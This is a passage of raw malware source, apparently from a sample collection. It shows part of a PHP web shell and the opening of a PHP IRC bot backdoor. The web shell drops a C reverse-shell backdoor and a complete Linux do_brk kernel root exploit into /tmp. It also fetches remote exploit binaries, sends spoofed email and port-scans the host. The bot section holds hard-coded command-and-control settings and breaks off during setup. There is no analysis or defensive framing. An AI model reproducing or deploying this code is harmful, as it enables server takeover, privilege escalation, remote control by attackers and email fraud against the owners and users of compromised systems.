if (@is_writable($file) && @is_file($file)) {
|
||||||
|
$file1 = fileowner($file);
|
||||||
|
$file2 = fileperms($file);
|
||||||
|
echo "<font color=red>$file1 - $file2 - $file </font><br>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
echo "</TD>";
|
||||||
|
echo "</TR>";
|
||||||
|
echo "</TABLE>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
?>
|
||||||
|
<?php
|
||||||
|
|
||||||
|
if ($shell == "write") {
|
||||||
|
$shell = "#include <stdio.h>\n" .
|
||||||
|
"#include <sys/socket.h>\n" .
|
||||||
|
"#include <netinet/in.h>\n" .
|
||||||
|
"#include <arpa/inet.h>\n" .
|
||||||
|
"#include <netdb.h>\n" .
|
||||||
|
"int main(int argc, char **argv) {\n" .
|
||||||
|
" char *host;\n" .
|
||||||
|
" int port = 80;\n" .
|
||||||
|
" int f;\n" .
|
||||||
|
" int l;\n" .
|
||||||
|
" int sock;\n" .
|
||||||
|
" struct in_addr ia;\n" .
|
||||||
|
" struct sockaddr_in sin, from;\n" .
|
||||||
|
" struct hostent *he;\n" .
|
||||||
|
" char msg[ ] = \"Welcome to Haji virus Connect Back Shell\\n\\n\"\n" .
|
||||||
|
" \"Issue \\\"export TERM=xterm; exec bash -i\\\"\\n\"\n" .
|
||||||
|
" \"For More Reliable Shell.\\n\"\n" .
|
||||||
|
" \"Issue \\\"unset HISTFILE; unset SAVEHIST\\\"\\n\"\n" .
|
||||||
|
" \"For Not Getting Logged.\\n(;\\n\\n\";\n" .
|
||||||
|
" printf(\"Haji virus Connect Back Backdoor\\n\\n\");\n" .
|
||||||
|
" if (argc < 2 || argc > 3) {\n" .
|
||||||
|
" printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .
|
||||||
|
" return 1;\n" .
|
||||||
|
" }\n" .
|
||||||
|
" printf(\"[*] Dumping Arguments\\n\");\n" .
|
||||||
|
" l = strlen(argv[1]);\n" .
|
||||||
|
" if (l <= 0) {\n" .
|
||||||
|
" printf(\"[-] Invalid Host Name\\n\");\n" .
|
||||||
|
" return 1;\n" .
|
||||||
|
" }\n" .
|
||||||
|
" if (!(host = (char *) malloc(l))) {\n" .
|
||||||
|
" printf(\"[-] Unable to Allocate Memory\\n\");\n" .
|
||||||
|
" return 1;\n" .
|
||||||
|
" }\n" .
|
||||||
|
" strncpy(host, argv[1], l);\n" .
|
||||||
|
" if (argc == 3) {\n" .
|
||||||
|
" port = atoi(argv[2]);\n" .
|
||||||
|
" if (port <= 0 || port > 65535) {\n" .
|
||||||
|
" printf(\"[-] Invalid Port Number\\n\");\n" .
|
||||||
|
" return 1;\n" .
|
||||||
|
" }\n" .
|
||||||
|
" }\n" .
|
||||||
|
" printf(\"[*] Resolving Host Name\\n\");\n" .
|
||||||
|
" he = gethostbyname(host);\n" .
|
||||||
|
" if (he) {\n" .
|
||||||
|
" memcpy(&ia.s_addr, he->h_addr, 4);\n" .
|
||||||
|
" } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {\n" .
|
||||||
|
" printf(\"[-] Unable to Resolve: %s\\n\", host);\n" .
|
||||||
|
" return 1;\n" .
|
||||||
|
" }\n" .
|
||||||
|
" sin.sin_family = PF_INET;\n" .
|
||||||
|
" sin.sin_addr.s_addr = ia.s_addr;\n" .
|
||||||
|
" sin.sin_port = htons(port);\n" .
|
||||||
|
" printf(\"[*] Connecting...\\n\");\n" .
|
||||||
|
" if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\n" .
|
||||||
|
" printf(\"[-] Socket Error\\n\");\n" .
|
||||||
|
" return 1;\n" .
|
||||||
|
" }\n" .
|
||||||
|
" if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {\n" .
|
||||||
|
" printf(\"[-] Unable to Connect\\n\");\n" .
|
||||||
|
" return 1;\n" .
|
||||||
|
" }\n" .
|
||||||
|
" printf(\"[*] Spawning Shell\\n\");\n" .
|
||||||
|
" f = fork( );\n" .
|
||||||
|
" if (f < 0) {\n" .
|
||||||
|
" printf(\"[-] Unable to Fork\\n\");\n" .
|
||||||
|
" return 1;\n" .
|
||||||
|
" } else if (!f) {\n" .
|
||||||
|
" write(sock, msg, sizeof(msg));\n" .
|
||||||
|
" dup2(sock, 0);\n" .
|
||||||
|
" dup2(sock, 1);\n" .
|
||||||
|
" dup2(sock, 2);\n" .
|
||||||
|
" execl(\"/bin/sh\", \"shell\", NULL);\n" .
|
||||||
|
" close(sock);\n" .
|
||||||
|
" return 0;\n" .
|
||||||
|
" }\n" .
|
||||||
|
" printf(\"[*] Detached\\n\\n\");\n" .
|
||||||
|
" return 0;\n" .
|
||||||
|
"}\n";
|
||||||
|
|
||||||
|
$fp = fopen("/tmp/dc-connectback.c", "w");
|
||||||
|
$ok = fwrite($fp, $shell);
|
||||||
|
|
||||||
|
if (!empty($ok)) {
|
||||||
|
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Connect Back Shell Was Successfuly Copied</DIV>";
|
||||||
|
} else {
|
||||||
|
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Copying Shell</DIV>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($kernel == "write") {
|
||||||
|
$kernel = "/*\n" .
|
||||||
|
" * hatorihanzo.c\n" .
|
||||||
|
" * Linux kernel do_brk vma overflow exploit.\n" .
|
||||||
|
" *\n" .
|
||||||
|
" * The bug was found by Paul (IhaQueR) Starzetz <paul@isec.pl>\n" .
|
||||||
|
" *\n" .
|
||||||
|
" * Further research and exploit development by\n" .
|
||||||
|
" * Wojciech Purczynski <cliph@isec.pl> and Paul Starzetz.\n" .
|
||||||
|
" *\n" .
|
||||||
|
" * (c) 2003 Copyright by IhaQueR and cliph. All Rights Reserved.\n" .
|
||||||
|
" *\n" .
|
||||||
|
" * COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION AND ANY USE\n" .
|
||||||
|
" * OF PRESENTED CODE IS STRICTLY PROHIBITED.\n" .
|
||||||
|
"*/\n" .
|
||||||
|
"#define _GNU_SOURCE\n" .
|
||||||
|
"#include <stdio.h>\n" .
|
||||||
|
"#include <stdlib.h>\n" .
|
||||||
|
"#include <errno.h>\n" .
|
||||||
|
"#include <string.h>\n" .
|
||||||
|
"#include <unistd.h>\n" .
|
||||||
|
"#include <fcntl.h>\n" .
|
||||||
|
"#include <signal.h>\n" .
|
||||||
|
"#include <paths.h>\n" .
|
||||||
|
"#include <grp.h>\n" .
|
||||||
|
"#include <setjmp.h>\n" .
|
||||||
|
"#include <stdint.h>\n" .
|
||||||
|
"#include <sys/mman.h>\n" .
|
||||||
|
"#include <sys/ipc.h>\n" .
|
||||||
|
"#include <sys/shm.h>\n" .
|
||||||
|
"#include <sys/ucontext.h>\n" .
|
||||||
|
"#include <sys/wait.h>\n" .
|
||||||
|
"#include <asm/ldt.h>\n" .
|
||||||
|
"#include <asm/page.h>\n" .
|
||||||
|
"#include <asm/segment.h>\n" .
|
||||||
|
"#include <linux/unistd.h>\n" .
|
||||||
|
"#include <linux/linkage.h>\n" .
|
||||||
|
"#define kB * 1024\n" .
|
||||||
|
"#define MB * 1024 kB\n" .
|
||||||
|
"#define GB * 1024 MB\n" .
|
||||||
|
"#define MAGIC 0xdefaced /* I should've patented this number -cliph */\n" .
|
||||||
|
"#define ENTRY_MAGIC 0\n" .
|
||||||
|
"#define ENTRY_GATE 2\n" .
|
||||||
|
"#define ENTRY_CS 4\n" .
|
||||||
|
"#define ENTRY_DS 6\n" .
|
||||||
|
"#define CS ((ENTRY_CS << 2) | 4)\n" .
|
||||||
|
"#define DS ((ENTRY_DS << 2) | 4)\n" .
|
||||||
|
"#define GATE ((ENTRY_GATE << 2) | 4 | 3)\n" .
|
||||||
|
"#define LDT_PAGES ((LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1) / PAGE_SIZE)\n" .
|
||||||
|
"#define TOP_ADDR 0xFFFFE000U\n" .
|
||||||
|
"/* configuration */\n" .
|
||||||
|
"unsigned task_size;\n" .
|
||||||
|
"unsigned page;\n" .
|
||||||
|
"uid_t uid;\n" .
|
||||||
|
"unsigned address;\n" .
|
||||||
|
"int dontexit = 0;\n" .
|
||||||
|
"void fatal(char * msg)\n" .
|
||||||
|
"{\n" .
|
||||||
|
" fprintf(stderr, \"[-] %s: %s\\n\", msg, strerror(errno));\n" .
|
||||||
|
" if (dontexit) {\n" .
|
||||||
|
" fprintf(stderr, \"[-] Unable to exit, entering neverending loop.\\n\");\n" .
|
||||||
|
" kill(getpid(), SIGSTOP);\n" .
|
||||||
|
" for (;;) pause();\n" .
|
||||||
|
" }\n" .
|
||||||
|
" exit(EXIT_FAILURE);\n" .
|
||||||
|
"}\n" .
|
||||||
|
"void configure(void)\n" .
|
||||||
|
"{\n" .
|
||||||
|
" unsigned val;\n" .
|
||||||
|
" task_size = ((unsigned)&val + 1 GB ) / (1 GB) * 1 GB;\n" .
|
||||||
|
" uid = getuid();\n" .
|
||||||
|
"}\n" .
|
||||||
|
"void expand(void)\n" .
|
||||||
|
"{\n" .
|
||||||
|
" unsigned top = (unsigned) sbrk(0);\n" .
|
||||||
|
" unsigned limit = address + PAGE_SIZE;\n" .
|
||||||
|
" do {\n" .
|
||||||
|
" if (sbrk(PAGE_SIZE) == NULL)\n" .
|
||||||
|
" fatal(\"Kernel seems not to be vulnerable\");\n" .
|
||||||
|
" dontexit = 1;\n" .
|
||||||
|
" top += PAGE_SIZE;\n" .
|
||||||
|
" } while (top < limit);\n" .
|
||||||
|
"}\n" .
|
||||||
|
"jmp_buf jmp;\n" .
|
||||||
|
"#define MAP_NOPAGE 1\n" .
|
||||||
|
"#define MAP_ISPAGE 2\n" .
|
||||||
|
"void sigsegv(int signo, siginfo_t * si, void * ptr)\n" .
|
||||||
|
"{\n" .
|
||||||
|
" struct ucontext * uc = (struct ucontext *) ptr;\n" .
|
||||||
|
" int error_code = uc->uc_mcontext.gregs[REG_ERR];\n" .
|
||||||
|
" (void)signo;\n" .
|
||||||
|
" (void)si;\n" .
|
||||||
|
" error_code = MAP_NOPAGE + (error_code & 1);\n" .
|
||||||
|
" longjmp(jmp, error_code);\n" .
|
||||||
|
"}\n" .
|
||||||
|
"void prepare(void)\n" .
|
||||||
|
"{\n" .
|
||||||
|
" struct sigaction sa;\n" .
|
||||||
|
" sa.sa_sigaction = sigsegv;\n" .
|
||||||
|
" sa.sa_flags = SA_SIGINFO | SA_NOMASK;\n" .
|
||||||
|
" sigemptyset(&sa.sa_mask);\n" .
|
||||||
|
" sigaction(SIGSEGV, &sa, NULL);\n" .
|
||||||
|
"}\n" .
|
||||||
|
"int testaddr(unsigned addr)\n" .
|
||||||
|
"{\n" .
|
||||||
|
" int val;\n" .
|
||||||
|
" val = setjmp(jmp);\n" .
|
||||||
|
" if (val == 0) {\n" .
|
||||||
|
" asm (\"verr (%%eax)\" : : \"a\" (addr));\n" .
|
||||||
|
" return MAP_ISPAGE;\n" .
|
||||||
|
" }\n" .
|
||||||
|
" return val;\n" .
|
||||||
|
"}\n" .
|
||||||
|
"#define map_pages (((TOP_ADDR - task_size) + PAGE_SIZE - 1) / PAGE_SIZE)\n" .
|
||||||
|
"#define map_size (map_pages + 8*sizeof(unsigned) - 1) / (8*sizeof(unsigned))\n" .
|
||||||
|
"#define next(u, b) do { if ((b = 2*b) == 0) { b = 1; u++; } } while(0)\n" .
|
||||||
|
"void map(unsigned * map)\n" .
|
||||||
|
"{\n" .
|
||||||
|
" unsigned addr = task_size;\n" .
|
||||||
|
" unsigned bit = 1;\n" .
|
||||||
|
" prepare();\n" .
|
||||||
|
" while (addr < TOP_ADDR) {\n" .
|
||||||
|
" if (testaddr(addr) == MAP_ISPAGE)\n" .
|
||||||
|
" *map |= bit;\n" .
|
||||||
|
" addr += PAGE_SIZE;\n" .
|
||||||
|
" next(map, bit);\n" .
|
||||||
|
" }\n" .
|
||||||
|
" signal(SIGSEGV, SIG_DFL);\n" .
|
||||||
|
"}\n" .
|
||||||
|
"void find(unsigned * m)\n" .
|
||||||
|
"{\n" .
|
||||||
|
" unsigned addr = task_size;\n" .
|
||||||
|
" unsigned bit = 1;\n" .
|
||||||
|
" unsigned count;\n" .
|
||||||
|
" unsigned tmp;\n" .
|
||||||
|
" prepare();\n" .
|
||||||
|
" tmp = address = count = 0U;\n" .
|
||||||
|
" while (addr < TOP_ADDR) {\n" .
|
||||||
|
" int val = testaddr(addr);\n" .
|
||||||
|
" if (val == MAP_ISPAGE && (*m & bit) == 0) {\n" .
|
||||||
|
" if (!tmp) tmp = addr;\n" .
|
||||||
|
" count++;\n" .
|
||||||
|
" } else {\n" .
|
||||||
|
" if (tmp && count == LDT_PAGES) {\n" .
|
||||||
|
" errno = EAGAIN;\n" .
|
||||||
|
" if (address)\n" .
|
||||||
|
" fatal(\"double allocation\\n\");\n" .
|
||||||
|
" address = tmp;\n" .
|
||||||
|
" }\n" .
|
||||||
|
" tmp = count = 0U;\n" .
|
||||||
|
" }\n" .
|
||||||
|
" addr += PAGE_SIZE;\n" .
|
||||||
|
" next(m, bit);\n" .
|
||||||
|
" }\n" .
|
||||||
|
" signal(SIGSEGV, SIG_DFL);\n" .
|
||||||
|
" if (address)\n" .
|
||||||
|
" return;\n" .
|
||||||
|
" errno = ENOTSUP;\n" .
|
||||||
|
" fatal(\"Unable to determine kernel address\");\n" .
|
||||||
|
"}\n" .
|
||||||
|
"int modify_ldt(int, void *, unsigned);\n" .
|
||||||
|
"void ldt(unsigned * m)\n" .
|
||||||
|
"{\n" .
|
||||||
|
" struct modify_ldt_ldt_s l;\n" .
|
||||||
|
" map(m);\n" .
|
||||||
|
" memset(&l, 0, sizeof(l));\n" .
|
||||||
|
" l.entry_number = LDT_ENTRIES - 1;\n" .
|
||||||
|
" l.seg_32bit = 1;\n" .
|
||||||
|
" l.base_addr = MAGIC >> 16;\n" .
|
||||||
|
" l.limit = MAGIC & 0xffff;\n" .
|
||||||
|
" if (modify_ldt(1, &l, sizeof(l)) == -1)\n" .
|
||||||
|
" fatal(\"Unable to set up LDT\");\n" .
|
||||||
|
" l.entry_number = ENTRY_MAGIC / 2;\n" .
|
||||||
|
" if (modify_ldt(1, &l, sizeof(l)) == -1)\n" .
|
||||||
|
" fatal(\"Unable to set up LDT\");\n" .
|
||||||
|
" find(m);\n" .
|
||||||
|
"}\n" .
|
||||||
|
"asmlinkage void kernel(unsigned * task)\n" .
|
||||||
|
"{\n" .
|
||||||
|
" unsigned * addr = task;\n" .
|
||||||
|
" /* looking for uids */\n" .
|
||||||
|
" while (addr[0] != uid || addr[1] != uid ||\n" .
|
||||||
|
" addr[2] != uid || addr[3] != uid)\n" .
|
||||||
|
" addr++;\n" .
|
||||||
|
" addr[0] = addr[1] = addr[2] = addr[3] = 0; /* uids */\n" .
|
||||||
|
" addr[4] = addr[5] = addr[6] = addr[7] = 0; /* uids */\n" .
|
||||||
|
" addr[8] = 0;\n" .
|
||||||
|
" /* looking for vma */\n" .
|
||||||
|
" for (addr = (unsigned *) task_size; addr; addr++) {\n" .
|
||||||
|
" if (addr[0] >= task_size && addr[1] < task_size &&\n" .
|
||||||
|
" addr[2] == address && addr[3] >= task_size) {\n" .
|
||||||
|
" addr[2] = task_size - PAGE_SIZE;\n" .
|
||||||
|
" addr = (unsigned *) addr[3];\n" .
|
||||||
|
" addr[1] = task_size - PAGE_SIZE;\n" .
|
||||||
|
" addr[2] = task_size;\n" .
|
||||||
|
" break;\n" .
|
||||||
|
" }\n" .
|
||||||
|
" }\n" .
|
||||||
|
"}\n" .
|
||||||
|
"void kcode(void);\n" .
|
||||||
|
"#define __str(s) #s\n" .
|
||||||
|
"#define str(s) __str(s)\n" .
|
||||||
|
"void __kcode(void)\n" .
|
||||||
|
"{\n" .
|
||||||
|
" asm(\n" .
|
||||||
|
" \"kcode: \\n\"\n" .
|
||||||
|
" \" pusha \\n\"\n" .
|
||||||
|
" \" pushl %es \\n\"\n" .
|
||||||
|
" \" pushl %ds \\n\"\n" .
|
||||||
|
" \" movl $(\" str(DS) \") ,%edx \\n\"\n" .
|
||||||
|
" \" movl %edx,%es \\n\"\n" .
|
||||||
|
" \" movl %edx,%ds \\n\"\n" .
|
||||||
|
" \" movl $0xffffe000,%eax \\n\"\n" .
|
||||||
|
" \" andl %esp,%eax \\n\"\n" .
|
||||||
|
" \" pushl %eax \\n\"\n" .
|
||||||
|
" \" call kernel \\n\"\n" .
|
||||||
|
" \" addl $4, %esp \\n\"\n" .
|
||||||
|
" \" popl %ds \\n\"\n" .
|
||||||
|
" \" popl %es \\n\"\n" .
|
||||||
|
" \" popa \\n\"\n" .
|
||||||
|
" \" lret \\n\"\n" .
|
||||||
|
" );\n" .
|
||||||
|
"}\n" .
|
||||||
|
"void knockout(void)\n" .
|
||||||
|
"{\n" .
|
||||||
|
" unsigned * addr = (unsigned *) address;\n" .
|
||||||
|
" if (mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE) == -1)\n" .
|
||||||
|
" fatal(\"Unable to change page protection\");\n" .
|
||||||
|
" errno = ESRCH;\n" .
|
||||||
|
" if (addr[ENTRY_MAGIC] != MAGIC)\n" .
|
||||||
|
" fatal(\"Invalid LDT entry\");\n" .
|
||||||
|
" /* setting call gate and privileged descriptors */\n" .
|
||||||
|
" addr[ENTRY_GATE+0] = ((unsigned)CS << 16) | ((unsigned)kcode & 0xffffU);\n" .
|
||||||
|
" addr[ENTRY_GATE+1] = ((unsigned)kcode & ~0xffffU) | 0xec00U;\n" .
|
||||||
|
" addr[ENTRY_CS+0] = 0x0000ffffU; /* kernel 4GB code at 0x00000000 */\n" .
|
||||||
|
" addr[ENTRY_CS+1] = 0x00cf9a00U;\n" .
|
||||||
|
" addr[ENTRY_DS+0] = 0x0000ffffU; /* user 4GB code at 0x00000000 */\n" .
|
||||||
|
" addr[ENTRY_DS+1] = 0x00cf9200U;\n" .
|
||||||
|
" prepare();\n" .
|
||||||
|
" if (setjmp(jmp) != 0) {\n" .
|
||||||
|
" errno = ENOEXEC;\n" .
|
||||||
|
" fatal(\"Unable to jump to call gate\");\n" .
|
||||||
|
" }\n" .
|
||||||
|
" asm(\"lcall $\" str(GATE) \",$0x0\"); /* this is it */\n" .
|
||||||
|
"}\n" .
|
||||||
|
"void shell(void)\n" .
|
||||||
|
"{\n" .
|
||||||
|
" char * argv[] = { _PATH_BSHELL, NULL };\n" .
|
||||||
|
" execve(_PATH_BSHELL, argv, environ);\n" .
|
||||||
|
" fatal(\"Unable to spawn shell\\n\");\n" .
|
||||||
|
"}\n" .
|
||||||
|
"void remap(void)\n" .
|
||||||
|
"{\n" .
|
||||||
|
" static char stack[8 MB]; /* new stack */\n" .
|
||||||
|
" static char * envp[] = { \"PATH=\" _PATH_STDPATH, NULL };\n" .
|
||||||
|
" static unsigned * m;\n" .
|
||||||
|
" static unsigned b;\n" .
|
||||||
|
" m = (unsigned *) sbrk(map_size);\n" .
|
||||||
|
" if (!m)\n" .
|
||||||
|
" fatal(\"Unable to allocate memory\");\n" .
|
||||||
|
" environ = envp;\n" .
|
||||||
|
" asm (\"movl %0, %%esp\\n\" : : \"a\" (stack + sizeof(stack)));\n" .
|
||||||
|
" b = ((unsigned)sbrk(0) + PAGE_SIZE - 1) & PAGE_MASK;\n" .
|
||||||
|
" if (munmap((void*)b, task_size - b) == -1)\n" .
|
||||||
|
" fatal(\"Unable to unmap stack\");\n" .
|
||||||
|
" while (b < task_size) {\n" .
|
||||||
|
" if (sbrk(PAGE_SIZE) == NULL)\n" .
|
||||||
|
" fatal(\"Unable to expand BSS\");\n" .
|
||||||
|
" b += PAGE_SIZE;\n" .
|
||||||
|
" }\n" .
|
||||||
|
" ldt(m);\n" .
|
||||||
|
" expand();\n" .
|
||||||
|
" knockout();\n" .
|
||||||
|
" shell();\n" .
|
||||||
|
"}\n" .
|
||||||
|
"int main(void)\n" .
|
||||||
|
"{\n" .
|
||||||
|
" configure();\n" .
|
||||||
|
" remap();\n" .
|
||||||
|
" return EXIT_FAILURE;\n" .
|
||||||
|
"}\n";
|
||||||
|
|
||||||
|
$fp = fopen("/tmp/xpl_brk.c", "w");
|
||||||
|
$ok = fwrite($fp, $kernel);
|
||||||
|
|
||||||
|
if (!empty($ok)) {
|
||||||
|
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Linux Local Kernel Exploit Was Successfuly Copied</DIV>";
|
||||||
|
} else {
|
||||||
|
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Copying Kernel Exploit</DIV>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
?>
|
||||||
|
</CENTER>
|
||||||
|
<pre><font face="Tahoma" size="2">
|
||||||
|
<?php
|
||||||
|
|
||||||
|
// Function to Visualize Source Code files
|
||||||
|
if ($see != "") {
|
||||||
|
$fp = fopen($see, "r");
|
||||||
|
$read = fread($fp, 30000);
|
||||||
|
echo "============== $see ================<br>";
|
||||||
|
echo "<textarea name=textarea cols=80 rows=15>";
|
||||||
|
echo "$read";
|
||||||
|
Echo "</textarea>";
|
||||||
|
}
|
||||||
|
|
||||||
|
// Function to Dowload Local Xploite Binary COde or Source Code
|
||||||
|
|
||||||
|
if ($dx != "") {
|
||||||
|
$fp = @fopen("$hostxpl",r);
|
||||||
|
$fp2 = @fopen("$storage","w");
|
||||||
|
fwrite($fp2, "");
|
||||||
|
$fp1 = @fopen("$storage","a+");
|
||||||
|
for (;;) {
|
||||||
|
$read = @fread($fp, 4096);
|
||||||
|
if (empty($read)) break;
|
||||||
|
$ok = fwrite($fp1, $read);
|
||||||
|
|
||||||
|
if (empty($ok)) {
|
||||||
|
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Uploading File</DIV>";
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!empty($ok)) {
|
||||||
|
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] File Was Successfuly Uploaded</DIV>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
flush( );
|
||||||
|
|
||||||
|
// Function to visulize Format Color Source Code PHP
|
||||||
|
|
||||||
|
if ($sfc != "") {
|
||||||
|
$showcode = show_source("$sfc");
|
||||||
|
echo "<font size=4> $showcode </font>";
|
||||||
|
}
|
||||||
|
|
||||||
|
// Function to Visualize all infomation files
|
||||||
|
if ($fileinfo != "") {
|
||||||
|
$infofile = stat("$fileanalize");
|
||||||
|
while (list($info, $value) = each ($infofile)) {
|
||||||
|
echo" Info: $info Value: $value <br>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Function to send fake mail
|
||||||
|
if ($fake == 1) {
|
||||||
|
echo "<FORM METHOD=POST ACTION=%22$SCRIPT_NAME?$QUERY_STRING&send=1/">";
|
||||||
|
echo "Your Fake Mail <INPUT TYPE=\"\" NAME=\"yourmail\" size="20"><br>";
|
||||||
|
echo "Your Cavy:<INPUT TYPE=\"\" NAME=\"cavy\" size="20"><br>";
|
||||||
|
echo "Suject: <INPUT TYPE=\"text\" NAME=\"subject\" size="20"><br>";
|
||||||
|
echo "Text: <TEXTAREA NAME=\"body\" ROWS=\"\" COLS=\"\"></TEXTAREA><br>";
|
||||||
|
echo "<INPUT TYPE=\"hidden\" NAME=\"send\" VALUE=\"1\" size="20"><br>";
|
||||||
|
echo "<INPUT TYPE=\"submit\" VALUE=\"Send Fake Mail\" size="20">";
|
||||||
|
echo "</FORM>";
|
||||||
|
}
|
||||||
|
|
||||||
|
if($send == 1) {
|
||||||
|
if (mail($cavy, $subject, $body, "From: $yourmail\r\n")) {
|
||||||
|
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Mail Send Sucessfuly</DIV>";
|
||||||
|
} else {
|
||||||
|
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Sending Mail</DIV>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($portscan != "") {
|
||||||
|
$port = array ("21","22","23","25","110",);
|
||||||
|
$values = count($port);
|
||||||
|
for ($cont=0; $cont < $values; $cont++) {
|
||||||
|
@$sock[$cont] = Fsockopen($SERVER_NAME, $port[$cont], $oi, $oi2, 1);
|
||||||
|
$service = Getservbyport($port[$cont],"tcp");
|
||||||
|
@$get = fgets($sock[$cont]);
|
||||||
|
echo "<br>Port: $port[$cont] - Service: $service<br><br>";
|
||||||
|
echo "<br>Banner: $get <br><br>";
|
||||||
|
flush();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
?>
|
||||||
|
</font></pre>
|
640
PHP/Backdoor.PHP.IRCBot.b
Normal file
640
PHP/Backdoor.PHP.IRCBot.b
Normal file
@ -0,0 +1,640 @@
|
|||||||
|
</html>
|
||||||
|
<?php
|
||||||
|
//fighter script - ibli
|
||||||
|
function working() {
|
||||||
|
$querym=array(
|
||||||
|
"?",
|
||||||
|
"!",
|
||||||
|
"^^",
|
||||||
|
" ^^",
|
||||||
|
" :(",
|
||||||
|
" :)",
|
||||||
|
" ~:>",
|
||||||
|
" :P~",
|
||||||
|
" :D",
|
||||||
|
",",
|
||||||
|
".",
|
||||||
|
"a",
|
||||||
|
"i",
|
||||||
|
"u",
|
||||||
|
"e",
|
||||||
|
"o",
|
||||||
|
"z",
|
||||||
|
"v",
|
||||||
|
"z",
|
||||||
|
"x",
|
||||||
|
"c",
|
||||||
|
"p",
|
||||||
|
"m",
|
||||||
|
"t",
|
||||||
|
"k",
|
||||||
|
"b",
|
||||||
|
"s",
|
||||||
|
"u",
|
||||||
|
"bot",
|
||||||
|
"g",
|
||||||
|
"lo",
|
||||||
|
"jo",
|
||||||
|
"lol"
|
||||||
|
);
|
||||||
|
$tsu1=array("`","|","[","]","{","}","^","_");
|
||||||
|
$tsu2=array("`","|","[","]","{","}","^","-","\\","_");
|
||||||
|
$nicky=array(
|
||||||
|
"kaiyoooooo",
|
||||||
|
"arieeee",
|
||||||
|
"neotechhh",
|
||||||
|
"gielahh",
|
||||||
|
"sashaimoet",
|
||||||
|
"raracantixs",
|
||||||
|
"iimgituloch",
|
||||||
|
"aweGspots",
|
||||||
|
"tukiyemsss",
|
||||||
|
"CZzzzzz",
|
||||||
|
"gunturaja",
|
||||||
|
"coepiddd",
|
||||||
|
"shymphonixs",
|
||||||
|
"kemplungggg",
|
||||||
|
"eillennnss",
|
||||||
|
"sebelumcahayaa",
|
||||||
|
"cecep`gorbachev",
|
||||||
|
"Kuba`Saku",
|
||||||
|
"Kisi`Mura",
|
||||||
|
"weduslucuuuu",
|
||||||
|
"chodileeeaja",
|
||||||
|
"YusiKita",
|
||||||
|
"shymphonix",
|
||||||
|
"cantikmaisya",
|
||||||
|
"gracenatalie",
|
||||||
|
"gukongsss",
|
||||||
|
"gugunacehh",
|
||||||
|
"rocheeeee",
|
||||||
|
"cupidsoloo",
|
||||||
|
"namakam",
|
||||||
|
"chynthya",
|
||||||
|
"MukamuSadaki",
|
||||||
|
"MasimudaMasupi",
|
||||||
|
"Akubukaumasuki",
|
||||||
|
"Daryuss",
|
||||||
|
"kudi`san",
|
||||||
|
"TyadaRumah",
|
||||||
|
"nick5aja",
|
||||||
|
"po",
|
||||||
|
"salehooo",
|
||||||
|
"reebodd",
|
||||||
|
"Sukiatasi",
|
||||||
|
"Bg3pl",
|
||||||
|
"sashaaa",
|
||||||
|
"legowooozz",
|
||||||
|
"adeetttt",
|
||||||
|
"aweeeeezz",
|
||||||
|
"Defansaku",
|
||||||
|
"Mama`mia`",
|
||||||
|
"Gramws",
|
||||||
|
"valent`Rocsi",
|
||||||
|
"jinak`",
|
||||||
|
"kabayannnn",
|
||||||
|
"Pikachu`",
|
||||||
|
"Kiwrju",
|
||||||
|
"heruuuuu",
|
||||||
|
"reno",
|
||||||
|
"angklung",
|
||||||
|
"Cootex",
|
||||||
|
"Cononge",
|
||||||
|
"heriiiiii",
|
||||||
|
"Ampow",
|
||||||
|
"pingggg",
|
||||||
|
"payahhhhhh",
|
||||||
|
);
|
||||||
|
$usr1=array(
|
||||||
|
"EnglandChanss",
|
||||||
|
);
|
||||||
|
|
||||||
|
$nick = $nicky[rand(0,count($nicky) - 1)];
|
||||||
|
$awaymsg = " ";
|
||||||
|
$identify = '';
|
||||||
|
$Admin = 'dodolz';
|
||||||
|
$BOT_PASSWORD = 'servorum';
|
||||||
|
$channels = '#england';
|
||||||
|
$remotehst2= array("irc.telkom.net.id");
|
||||||
|
$remotehost= $remotehst2[rand(0,count($remotehst2) - 1)];
|
||||||
|
$port = '6667';
|
||||||
|
$realname = $nick;
|
||||||
|
$counterfp = 0;
|
||||||
|
$channels = str_replace("CNL","#",$channels);
|
||||||
|
print "<body bgcolor=#000000 text=#C0C0C0>";
|
||||||
|
print "<b>== Connecting to $remotehost...</b>";
|
||||||
|
|
||||||
|
|
||||||
|
$raway = "on";
|
||||||
|
$log = "off";
|
||||||
|
$saway = "1";
|
||||||
|
if (!$stime) { $stime = time(); }
|
||||||
|
if (!$port) { $port = "6666"; }
|
||||||
|
$Admin = strtolower($Admin);
|
||||||
|
$auth = array($Admin => array("name" => $Admin, "pass" => $BOT_PASSWORD, "auth" => 1,"status" => "Admin"));
|
||||||
|
|
||||||
|
$username = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
|
||||||
|
$keluar = 0;
|
||||||
|
$akill = 1;
|
||||||
|
$katime = 0;
|
||||||
|
$localhost = 'localhost';
|
||||||
|
